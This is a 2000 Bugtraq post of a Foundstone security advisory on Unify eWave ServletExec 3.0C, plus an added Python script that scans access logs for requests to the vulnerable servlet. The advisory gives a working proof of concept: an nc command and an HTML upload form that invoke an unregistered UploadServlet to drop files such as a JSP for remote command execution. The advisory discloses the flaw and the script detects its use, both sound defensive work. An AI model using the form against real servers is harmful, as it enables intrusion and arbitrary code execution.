Date:         Tue, 31 Oct 2000 20:38:58 -0800
From: Foundstone Labs <labs@FOUNDSTONE.COM>
Subject:      Unify eWave ServletExec upload
To: BUGTRAQ@SECURITYFOCUS.COM

                            Foundstone, Inc.
                        http://www.foundstone.com
                      "Securing the Dot Com World"

                           Security Advisory

                      Unify eWave ServletExec upload

----------------------------------------------------------------------
FS Advisory ID:         FS-103100-16-SRVX

Release Date:           October 31, 2000

Product:                Unify eWave ServletExec 3.0C

Vendor:                 Unify Corp.
                        (http://www.unifyewave.com/servletexec/)

Type:                   Uploading arbitrary files leading to remote
                        command execution.

Severity:               High

Author:                 Shreeraj Shah (shreeraj.shah@foundstone.com)
                        Saumil Shah (saumil.shah@foundstone.com)
                        Stuart McClure (stuart.mcclure@foundstone.com)
                        Foundstone, Inc. (http://www.foundstone.com)

Operating Systems:      All operating systems supported by ServletExec

Vulnerable versions:    Unify eWave ServletExec 3.0C

Foundstone Advisory:    http://www.foundstone.com/advisories.htm
----------------------------------------------------------------------

Description

        Unify's eWave ServletExec is a JSP and Java Servlet engine
        that is used as a plug-in to popular web servers such as
        Apache, IIS and Netscape.

        ServletExec has a servlet called "UploadServlet" in its server
        side classes. UploadServlet, when invokable, allows an
        attacker to upload any file to any directory on the server. The
        uploaded file may have code that can later be executed on the
        server, leading to remote command execution.

Details

        ServletExec has com.unify.ewave.servletexec.UploadServlet residing
        in its server side classes. Even though this servlet is not
        registered, it can be invoked on the server side by the following
        HTTP requests:

        nc 10.0.0.1 80
        GET /servlet/com.unify.ewave.servletexec.UploadServlet HTTP/1.0

        -or-

        http://10.0.0.1/servlet/com.unify.ewave.servletexec.UploadServlet

        An attacker can create an HTML form on his or her local system
        that uses this servlet to upload arbitrary files onto the server.
        A sample of such a form is given below:

        <FORM METHOD=POST ENCTYPE='multipart/form-data'
              ACTION='http://10.0.0.1/servlet/com.unify.ewave.servletexec.UploadServlet'>
        <P>
        Upload Directory:
        <INPUT TYPE=TEXT SIZE=35 Name=uploadDir>
        <P>
        File to Upload:
        <INPUT TYPE=FILE SIZE=35 NAME=File1>
        <P>
        <INPUT TYPE=SUBMIT NAME="Upload Files" VALUE="Upload Files">
        </FORM>

        Using this upload form, an attacker can upload a file, for
        example a JSP file, that can run arbitrary commands on the
        server side.
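
        To check whether a server has already received such requests,
        the following added example (not part of the Foundstone advisory)
        scans web server access logs for invocations of UploadServlet by
        class name. It assumes Common Log Format; the function names and
        the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Common Log Format: host ident user [time] "METHOD path PROTO" status bytes
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
# Class name taken from the advisory. Matching is done on the decoded,
# lower-cased path, so it is deliberately broader than the servlet engine.
TARGET_RE = re.compile(
    r'^/servlet/com\.unify\.ewave\.servletexec\.uploadservlet(?:[/;?].*)?$'
)

def classify(line):
    """Return (ip, method, verdict) for a request to UploadServlet, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # Drop the query string, decode %XX escapes, collapse repeated slashes.
    path = unquote(m["path"].split("?", 1)[0]).lower()
    path = re.sub(r"/{2,}", "/", path)
    if not TARGET_RE.match(path):
        return None
    ok = m["status"].startswith("2")
    if m["method"] == "POST" and ok:
        verdict = "upload-accepted"      # treat as a possible file drop
    elif ok:
        verdict = "servlet-invokable"    # unregistered servlet answered
    else:
        verdict = "probe-rejected"
    return (m["ip"], m["method"], verdict)

def scan(lines):
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [31/Oct/2000:20:00:01 -0800] "GET /index.html HTTP/1.0" 200 1043',
    '192.0.2.44 - - [31/Oct/2000:20:01:12 -0800] "GET /servlet/com.unify.ewave.servletexec.UploadServlet HTTP/1.0" 200 512',
    '192.0.2.44 - - [31/Oct/2000:20:01:40 -0800] "POST /servlet/com.unify.ewave.servletexec.UploadServlet HTTP/1.0" 200 230',
    '198.51.100.7 - - [31/Oct/2000:20:05:00 -0800] "GET /servlet/com.unify.ewave.servletexec.%55ploadServlet HTTP/1.0" 404 0',
    '192.0.2.10 - - [31/Oct/2000:20:06:30 -0800] "GET /servlet/SnoopServlet HTTP/1.0" 200 900',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```

        Any "upload-accepted" hit warrants reviewing the server's
        directories for files written around the time of that request.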

Solution

        Upgrade to ServletExec version 3.0E, available at:

        http://www.servletexec.com/downloads/

        Please contact the vendor for further details at
        info@unify.com or Unify Sales at 1-800-248-6439

Credits

        We would like to thank Unify for their prompt reaction to this
        problem and their co-operation in heightening awareness in the
        security community.

Disclaimer

        The information contained in this advisory is the copyright (C)
        2000 of Foundstone, Inc. and believed to be accurate at the time
        of printing, but no representation or warranty is given, express
        or implied, as to its accuracy or completeness. Neither the
        author nor the publisher accepts any liability whatsoever for
        any direct, indirect or consequential loss or damage arising in
        any way from any use of, or reliance placed on, this information
        for any purpose. This advisory may be redistributed provided that
        no fee is assigned and that the advisory is not modified in any
        way.